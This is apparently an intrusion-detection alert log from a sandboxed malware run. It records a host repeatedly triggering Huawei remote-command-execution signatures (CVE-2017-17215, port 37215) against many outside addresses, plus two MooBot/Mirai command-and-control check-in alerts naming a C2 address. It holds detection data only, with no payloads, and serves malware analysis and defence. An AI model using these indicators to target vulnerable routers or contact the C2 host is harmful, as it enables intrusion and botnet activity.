                                                    07/10/24-08:26:43.653276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275837215192.168.2.1440.93.116.157
                                                    07/10/24-08:26:11.136584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165437215192.168.2.14157.185.35.87
                                                    07/10/24-08:26:52.010263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301837215192.168.2.1441.114.205.149
                                                    07/10/24-08:26:13.778157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3349037215192.168.2.14218.144.238.52
                                                    07/10/24-08:26:43.551823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707037215192.168.2.14194.193.51.28
                                                    07/10/24-08:26:43.748441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362637215192.168.2.14142.254.158.214
                                                    07/10/24-08:27:30.428710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348637215192.168.2.14157.81.227.177
                                                    07/10/24-08:27:10.655390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5929037215192.168.2.1441.75.172.98
                                                    07/10/24-08:26:15.854117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5491837215192.168.2.14197.249.124.83
                                                    07/10/24-08:27:22.799639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702437215192.168.2.141.240.159.153
                                                    07/10/24-08:26:23.350538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152237215192.168.2.14157.43.113.197
                                                    07/10/24-08:26:57.654674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4489837215192.168.2.14157.120.84.86
                                                    07/10/24-08:26:57.636058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4456837215192.168.2.14197.53.222.62
                                                    07/10/24-08:26:51.960962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649837215192.168.2.14197.240.191.39
                                                    07/10/24-08:27:07.361334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5189837215192.168.2.1441.58.209.45
                                                    07/10/24-08:27:32.513805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737637215192.168.2.1441.2.88.97
                                                    07/10/24-08:26:22.218292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5972837215192.168.2.14111.169.58.168
                                                    07/10/24-08:26:57.636057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5816037215192.168.2.14197.21.50.249
                                                    07/10/24-08:26:57.505236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593837215192.168.2.1441.179.24.126
                                                    07/10/24-08:27:17.091838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433837215192.168.2.14157.93.43.69
                                                    07/10/24-08:27:28.140303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338237215192.168.2.1479.119.209.0
                                                    07/10/24-08:27:23.925021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869437215192.168.2.1441.34.241.131
                                                    07/10/24-08:26:38.520024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694237215192.168.2.1441.153.20.40
                                                    07/10/24-08:27:00.477021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5237237215192.168.2.14197.148.119.199
                                                    07/10/24-08:27:08.389316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952437215192.168.2.1441.107.76.151
                                                    07/10/24-08:27:05.146522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686037215192.168.2.14197.200.251.172
                                                    07/10/24-08:27:17.107652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850637215192.168.2.14197.32.68.236
                                                    07/10/24-08:26:45.651958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885237215192.168.2.14197.120.35.40
                                                    07/10/24-08:27:07.363074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204637215192.168.2.14197.87.255.30
                                                    07/10/24-08:26:53.172944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793037215192.168.2.14197.118.156.190
                                                    07/10/24-08:26:43.836589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5601237215192.168.2.14197.51.102.115
                                                    07/10/24-08:26:52.082361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472437215192.168.2.14197.49.226.95
                                                    07/10/24-08:27:32.607136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4752837215192.168.2.14129.77.72.105
                                                    07/10/24-08:26:34.267264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4756037215192.168.2.1441.225.154.175
                                                    07/10/24-08:26:59.805641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027437215192.168.2.14197.153.196.32
                                                    07/10/24-08:26:42.401812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108237215192.168.2.1441.27.11.134
                                                    07/10/24-08:27:33.833957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953437215192.168.2.14197.180.50.218
                                                    07/10/24-08:26:29.848557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3645437215192.168.2.14157.75.249.209
                                                    07/10/24-08:26:11.512950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3907237215192.168.2.1461.176.198.121
                                                    07/10/24-08:27:08.349931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460037215192.168.2.1441.233.145.84
                                                    07/10/24-08:26:43.667979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672837215192.168.2.14197.1.173.208
                                                    07/10/24-08:27:02.742561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412437215192.168.2.14197.223.246.241
                                                    07/10/24-08:27:13.836090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660037215192.168.2.1447.226.66.175
                                                    07/10/24-08:26:28.651125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3494037215192.168.2.14197.21.187.166
                                                    07/10/24-08:27:02.847593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527037215192.168.2.1441.183.4.157
                                                    07/10/24-08:27:08.425890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544437215192.168.2.14197.71.159.83
                                                    07/10/24-08:26:28.835620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880037215192.168.2.1441.51.52.121
                                                    07/10/24-08:27:30.516492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5401637215192.168.2.1441.26.59.93
                                                    07/10/24-08:26:36.387027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690037215192.168.2.1441.33.243.194
                                                    07/10/24-08:26:26.483637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106037215192.168.2.14197.40.141.157
                                                    07/10/24-08:27:11.545525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727837215192.168.2.14153.89.83.80
                                                    07/10/24-08:26:28.897844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6074637215192.168.2.14200.71.233.67
                                                    07/10/24-08:27:19.319330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3680437215192.168.2.14157.76.218.109
                                                    07/10/24-08:26:26.596557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327437215192.168.2.1441.172.57.157
                                                    07/10/24-08:26:28.855166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066037215192.168.2.14157.203.34.171
                                                    07/10/24-08:27:02.899646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329237215192.168.2.14189.247.186.120
                                                    07/10/24-08:26:28.783011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510637215192.168.2.14157.226.40.136
                                                    07/10/24-08:27:28.153609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613637215192.168.2.14197.92.39.63
                                                    07/10/24-08:26:29.880406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6083237215192.168.2.1461.42.227.233
                                                    07/10/24-08:26:11.658202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211237215192.168.2.14157.11.188.194
                                                    07/10/24-08:27:22.472271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627837215192.168.2.14157.241.18.145
                                                    07/10/24-08:27:17.055063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3498237215192.168.2.14157.25.62.202
                                                    07/10/24-08:26:20.185610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973437215192.168.2.1441.20.133.163
                                                    07/10/24-08:26:23.280858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476837215192.168.2.1441.175.244.182
                                                    07/10/24-08:26:52.037167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201637215192.168.2.14145.180.79.88
                                                    07/10/24-08:26:59.870602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994437215192.168.2.14103.196.132.163
                                                    07/10/24-08:27:10.679025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4022237215192.168.2.14202.146.6.7
                                                    07/10/24-08:26:28.919298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934637215192.168.2.1441.17.96.77
                                                    07/10/24-08:26:41.489365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4066037215192.168.2.14158.150.136.148
                                                    07/10/24-08:27:17.066216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163837215192.168.2.1441.245.73.52
                                                    07/10/24-08:26:28.686336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4108837215192.168.2.1441.230.95.228
                                                    07/10/24-08:27:08.323465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725237215192.168.2.14157.68.35.98
                                                    07/10/24-08:26:25.423128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269637215192.168.2.14208.32.70.139
                                                    07/10/24-08:26:55.379647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412237215192.168.2.14157.181.42.78
                                                    07/10/24-08:26:43.915899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913837215192.168.2.14151.74.111.108
                                                    07/10/24-08:26:09.893581TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)431285976192.168.2.1451.79.141.54
                                                    07/10/24-08:27:11.522078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961037215192.168.2.1441.159.158.57
                                                    07/10/24-08:27:17.096498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175237215192.168.2.14145.158.190.77
                                                    07/10/24-08:26:18.036977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907837215192.168.2.14197.55.78.117
                                                    07/10/24-08:26:26.591213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643437215192.168.2.14197.101.112.153
                                                    07/10/24-08:26:26.599600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4220837215192.168.2.14196.130.26.26
                                                    07/10/24-08:27:24.973099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774037215192.168.2.1441.6.10.163
                                                    07/10/24-08:26:48.019376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629037215192.168.2.14157.232.245.26
                                                    07/10/24-08:26:31.099427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904837215192.168.2.14157.211.44.125
                                                    07/10/24-08:26:25.464984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965237215192.168.2.14197.42.154.109
                                                    07/10/24-08:26:34.202822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586637215192.168.2.1441.19.83.74
                                                    07/10/24-08:26:31.098599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3409237215192.168.2.14211.93.202.125
                                                    07/10/24-08:26:41.428443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5979237215192.168.2.14157.82.201.160
                                                    07/10/24-08:26:23.279248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255837215192.168.2.14197.20.81.84
                                                    07/10/24-08:27:11.542613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940037215192.168.2.14197.120.135.148
                                                    07/10/24-08:26:25.520739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853837215192.168.2.14197.88.213.1
                                                    07/10/24-08:26:13.833831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3823237215192.168.2.1441.130.69.12
                                                    07/10/24-08:26:28.916413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3602837215192.168.2.1441.5.185.230
                                                    07/10/24-08:26:15.840335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5090437215192.168.2.14146.131.226.72
                                                    07/10/24-08:26:17.967012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719637215192.168.2.1441.19.219.16
                                                    07/10/24-08:26:36.397079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772437215192.168.2.14100.221.207.105
                                                    07/10/24-08:27:27.053819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841237215192.168.2.14223.252.235.232
                                                    07/10/24-08:27:32.619838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355037215192.168.2.14144.243.147.102
                                                    07/10/24-08:27:13.714524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3662237215192.168.2.14157.191.96.240
                                                    07/10/24-08:26:48.006424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4583037215192.168.2.1441.41.138.236
                                                    07/10/24-08:26:55.386841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620637215192.168.2.14197.162.183.152
                                                    07/10/24-08:26:43.713774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205837215192.168.2.1427.91.250.152
                                                    07/10/24-08:26:52.069445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052437215192.168.2.1441.11.170.173
                                                    07/10/24-08:26:11.575956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5391237215192.168.2.14221.169.253.33
                                                    07/10/24-08:26:14.817162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806837215192.168.2.14157.82.130.195
                                                    07/10/24-08:26:14.757034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4518837215192.168.2.14157.22.66.182
                                                    07/10/24-08:26:38.529678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3593637215192.168.2.14157.196.194.93
                                                    07/10/24-08:26:59.757689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216837215192.168.2.14157.166.186.178
                                                    07/10/24-08:27:24.891062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348037215192.168.2.14157.73.106.152
                                                    07/10/24-08:27:30.533140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268037215192.168.2.1438.180.27.194
                                                    07/10/24-08:27:19.246570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5465637215192.168.2.1441.249.197.210
                                                    07/10/24-08:26:38.627693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981437215192.168.2.1473.126.42.198
                                                    07/10/24-08:27:20.407026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341437215192.168.2.1485.151.248.103
                                                    07/10/24-08:27:19.321754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592237215192.168.2.14157.41.64.5
                                                    07/10/24-08:26:29.819391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948037215192.168.2.14179.231.251.221
                                                    07/10/24-08:26:11.177651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458837215192.168.2.14197.186.174.45
                                                    07/10/24-08:27:20.481143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172037215192.168.2.14136.135.212.64
                                                    07/10/24-08:26:11.522836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841837215192.168.2.14115.126.63.255
                                                    07/10/24-08:27:07.389913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585237215192.168.2.1441.245.11.50
                                                    07/10/24-08:27:23.942038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265837215192.168.2.1441.132.187.207
                                                    07/10/24-08:26:20.132092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4663037215192.168.2.1441.102.49.143
                                                    07/10/24-08:27:30.460852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489437215192.168.2.14104.245.33.223
                                                    07/10/24-08:26:17.947291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391837215192.168.2.14157.36.138.166
                                                    07/10/24-08:26:38.573653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295837215192.168.2.14157.90.21.245
                                                    07/10/24-08:27:13.728066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374037215192.168.2.1441.207.235.106
                                                    07/10/24-08:26:28.853209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516437215192.168.2.1441.187.40.35
                                                    07/10/24-08:26:49.787588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282637215192.168.2.14191.44.32.131
                                                    07/10/24-08:26:59.783807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567037215192.168.2.1441.178.161.85
                                                    07/10/24-08:27:13.829336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4606437215192.168.2.14197.151.212.62
                                                    07/10/24-08:27:34.155156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803437215192.168.2.14197.50.60.172
                                                    07/10/24-08:27:11.525645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3337237215192.168.2.1447.168.217.132
                                                    07/10/24-08:26:33.257380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175437215192.168.2.14197.173.220.120
                                                    07/10/24-08:26:43.835820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081837215192.168.2.1441.104.249.236
                                                    07/10/24-08:27:02.989706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3301637215192.168.2.14157.9.14.194
                                                    07/10/24-08:27:14.882179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5567637215192.168.2.14197.78.45.251
                                                    07/10/24-08:27:23.499663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3834037215192.168.2.14197.92.105.144
                                                    07/10/24-08:27:02.815601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437837215192.168.2.1441.102.190.119
                                                    07/10/24-08:26:20.106591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6068837215192.168.2.14172.89.175.55
                                                    07/10/24-08:27:33.952249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3375437215192.168.2.14197.242.85.247
                                                    07/10/24-08:27:17.047442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562837215192.168.2.14126.227.216.97
                                                    07/10/24-08:27:07.376641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847037215192.168.2.14197.83.130.35
                                                    07/10/24-08:26:34.255855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533437215192.168.2.14157.20.135.251
                                                    07/10/24-08:26:59.643122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3969637215192.168.2.14157.230.186.103
                                                    07/10/24-08:26:55.426647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4998237215192.168.2.1441.109.84.161
                                                    07/10/24-08:27:10.615348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870837215192.168.2.14157.235.59.49
                                                    07/10/24-08:26:36.323441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831037215192.168.2.14133.192.103.126
                                                    07/10/24-08:26:59.640486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148237215192.168.2.1441.20.201.198
                                                    07/10/24-08:27:07.389277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4998237215192.168.2.1462.111.159.169
                                                    07/10/24-08:26:11.135196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4341837215192.168.2.14197.107.22.161
                                                    07/10/24-08:27:14.841554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4967037215192.168.2.14157.158.108.82
                                                    07/10/24-08:27:14.002170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721637215192.168.2.1441.10.197.81
                                                    07/10/24-08:26:36.372350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869037215192.168.2.14202.29.141.13
                                                    07/10/24-08:27:13.803034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673237215192.168.2.14157.119.58.117
                                                    07/10/24-08:27:27.178042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405837215192.168.2.14157.18.205.149
                                                    07/10/24-08:27:32.584145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3579037215192.168.2.1441.189.99.227
                                                    07/10/24-08:26:59.654831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4547237215192.168.2.14157.6.241.0
                                                    07/10/24-08:26:31.094211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804637215192.168.2.14197.241.5.165
                                                    07/10/24-08:27:11.551943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291237215192.168.2.14157.61.237.180
                                                    07/10/24-08:27:24.109532TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)363745976192.168.2.1451.79.141.54
                                                    07/10/24-08:26:31.093186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222837215192.168.2.14157.105.152.1
                                                    07/10/24-08:26:28.808876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234037215192.168.2.14197.53.148.182
                                                    07/10/24-08:27:11.612567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4058237215192.168.2.141.8.163.224
                                                    07/10/24-08:26:55.379647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5776237215192.168.2.14197.251.125.205
                                                    07/10/24-08:26:25.501206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801437215192.168.2.14197.236.214.253
                                                    07/10/24-08:26:53.213910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5645837215192.168.2.14157.213.4.180
                                                    07/10/24-08:26:59.835821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819037215192.168.2.1441.195.187.93
                                                    07/10/24-08:26:13.778927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146437215192.168.2.14157.82.104.201
                                                    07/10/24-08:26:36.433221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551637215192.168.2.1434.234.131.23
                                                    07/10/24-08:27:13.999286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330837215192.168.2.1492.34.46.62
                                                    07/10/24-08:26:26.588414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710637215192.168.2.1451.185.53.95
                                                    07/10/24-08:27:22.487649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236037215192.168.2.14142.211.137.198
                                                    07/10/24-08:27:20.520093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899637215192.168.2.1420.245.220.22
                                                    07/10/24-08:26:22.203668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4842437215192.168.2.1441.194.162.254
                                                    07/10/24-08:27:33.744023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732837215192.168.2.14157.85.10.52
                                                    07/10/24-08:26:41.525692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847437215192.168.2.1490.206.82.154
                                                    07/10/24-08:27:23.893533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538637215192.168.2.14197.102.248.167
                                                    07/10/24-08:26:15.871389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669637215192.168.2.1441.167.175.43
                                                    07/10/24-08:26:41.523308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538837215192.168.2.14197.235.103.149
                                                    07/10/24-08:26:41.397697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018437215192.168.2.14157.181.68.245
                                                    07/10/24-08:27:24.880000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773437215192.168.2.14197.234.202.75
                                                    07/10/24-08:26:33.259688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009437215192.168.2.14157.83.187.151
                                                    07/10/24-08:26:36.422103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475437215192.168.2.14197.157.10.90
                                                    07/10/24-08:27:19.299032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519037215192.168.2.1441.55.234.104
                                                    07/10/24-08:27:23.832820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4448837215192.168.2.14197.83.108.136
                                                    07/10/24-08:26:41.329184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3610637215192.168.2.1441.33.42.70
